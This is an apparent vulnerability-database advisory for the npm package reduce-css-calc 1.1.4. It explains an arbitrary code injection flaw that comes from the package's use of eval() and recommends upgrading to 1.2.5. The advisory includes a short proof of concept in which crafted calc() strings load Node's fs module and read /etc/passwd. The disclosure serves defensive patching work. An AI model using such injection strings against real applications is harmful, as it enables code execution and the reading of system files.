reduce-css-calc@1.1.4

Vulnerabilities 1 via 1 paths
Dependencies 3
Source npm
Package reduce-css-calc

Find, fix and prevent vulnerabilities in your code.

Severity
  • 1
Status
  • 1
  • 0
  • 0
high severity

Arbitrary Code Injection

  • Vulnerable module: reduce-css-calc
  • Introduced through: reduce-css-calc@1.1.4

Detailed paths

  • Introduced through: reduce-css-calc@1.1.4
    Remediation: Upgrade to reduce-css-calc@1.2.5.

Overview

reduce-css-calc is a package that reduces CSS calc() function to the maximum. Affected versions of the package used eval() for evaluation the expression, allowing the attacker to gain arbitrary code execution via specially crafted input.

Example

The issue was reported by ChALkeR and demonstrated by his example below:

const reduceCSSCalc = require('reduce-css-calc');
console.log(reduceCSSCalc(`calc(                       (Buffer(10000)))`));
console.log(reduceCSSCalc(`calc(                       (global['fs'] = require('fs')))`));
console.log(reduceCSSCalc(`calc(                       (fs['readFileSync']("/etc/passwd", "utf-8")))`));

Remediation

Upgrade reduce-css-calc version 1.2.5 or greater.

References